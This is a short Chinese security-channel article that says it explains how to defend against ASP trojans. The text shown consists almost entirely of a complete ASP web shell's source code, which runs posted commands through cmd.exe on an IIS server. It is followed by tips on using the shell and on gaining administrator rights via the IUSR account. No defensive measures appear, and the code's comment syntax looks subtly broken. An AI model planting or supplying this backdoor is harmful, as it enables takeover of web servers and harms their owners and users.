网络安全 频道

两种比较典型的ASP木马防范方法

随着ASP 技术的发展,网络上基于ASP技术开发的网站越来越多,对ASP技术的支持可以说已经是windows系统IIS服务器的一项基本功能。但是基于ASP技术的木马后门,也越来越多,而且功能也越来越强大。由于ASP它本身是服务器提供的一贡服务功能,所以这种ASP脚本的木马后门,不会被杀毒软件查杀。被黑客们称为“永远不会被查杀的后门”。由于其高度的隐蔽性和难查杀性,对网站的安全造成了严重的威胁。因此针对ASP木马的防范和清除,为我们的网管人员提出了更高的技术要求。下面我结合个人的经验,谈一下对两款比较典型的ASP 木马的防范方法,希望对大家能够有所帮助。 

  以下是第一款木马的代码: 

<title>ASP Shell</title> 
<%@ Language=VBScript %> 
<% 
Dim oScript 
Dim oScriptNet 
Dim oFileSys, oFile 
Dim szCMD, szTempFile 
On Error Resume Next 
-- create the COM objects that we will be using -- 
Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
-- check for a command that we have posted -- 
szCMD = Request.Form(".CMD") 
If (szCMD <> "") Then 
-- Use a poor mans pipe ... a temp file -- 
szTempFile = "C:" & oFileSys.GetTempName( ) 
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
End If 
%> 
<HTML> 
<BODY> 
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST"> 
<input type=text name=".CMD" size=45 value="<%= szCMD %>"> 
<input type=submit value="执行命令"> 
</FORM> 
<PRE><% 
If (IsObject(oFile)) Then 
-- Read the output from our command and remove the temp file -- 
On Error Resume Next 
Response.Write Server.HTMLEncode(oFile.ReadAll) 
oFile.Close 
Call oFileSys.DeleteFile(szTempFile, True) 
End If 
%> 
</BODY> 
</HTML> 

  在命令行里输入DIR命令点执行就可以查看目录了!!它可以使用各种DOS命令,如:copy、net、netstat等。 

  但是它的默认执行权限只有GUEST,也就是IUSR_COMPUTER用户的执行权限。当然如果你把IUSR_COMPUTER用户加入管理员组,那么你就有管理员权限了。这一款木马的特点是,使用很方便。几乎就想当于DOS命令行窗口xx作一样。但是如果服务器限制了FSO(无组件上传),那么它是没有办法使用了。还有就是在服务器以后增加的虚拟主机里也没有办法使用。只能在“默认 Web 站点”里使用,所以它相对的适用范围较窄。

 

 

 

 
 
0
相关文章